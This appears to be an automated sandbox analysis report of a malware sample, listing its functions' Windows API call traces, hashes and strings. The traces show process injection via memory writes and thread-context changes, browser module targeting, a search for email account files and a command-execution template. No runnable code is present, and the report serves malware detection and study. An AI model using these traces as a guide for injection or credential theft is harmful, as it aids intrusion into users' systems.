  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4E59, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystring
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2884, Relevance: 6.0, APIs: 4, Instructions: 41 Total matches: 66filestringsynchronization
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBCD2, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 99filesynchronizationpipe
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDF8E, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 105memorythread
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B329FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B3464F, Relevance: 6.0, APIs: 4, Instructions: 32 Total matches: 128memorystring
Similarity
  • Total matches: 128
  • API ID: lstrlen$RtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 1738276641-0
  • Opcode ID: aaba7d0a47ca100521561682d36ca88f08b4b9b0e2dd2eccb0d3987922e97ba9
  • Instruction ID: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
  • Opcode Fuzzy Hash: B7C012A4436C87C88CC059470679660D1C55FF6B0001C530BB0542A31D47523AB6758D
  • Instruction Fuzzy Hash: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
APIs
  • lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
  • lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
  • wsprintfW.USER32 ref: 01B3469A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD61D, Relevance: 6.0, APIs: 4, Instructions: 29 Total matches: 151sleepmemory
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA895, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7222, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58 Total matches: 58
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C77DE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46 Total matches: 59
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6241, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D87D7, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE2F9, Relevance: 5.1, APIs: 4, Instructions: 70 Total matches: 113string
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 63005

General

Root Process Name:d3d8sext.exe
Process MD5:2977C206A36F6D0CEC371F9F767DE1D3
Total matches:155
Initial Analysis Report:Open
Initial sample Analysis ID:63005
Initial sample SHA 256:663E6F25B541228C0555C984846E342BF801CAD542414DDD222BB947DEA49D56
Initial sample name:toto.exe

Similar Executed Functions

Function 001CDA13, Relevance: 10.6, APIs: 7, Instructions: 111 Total matches: 36string
Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D99D2, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
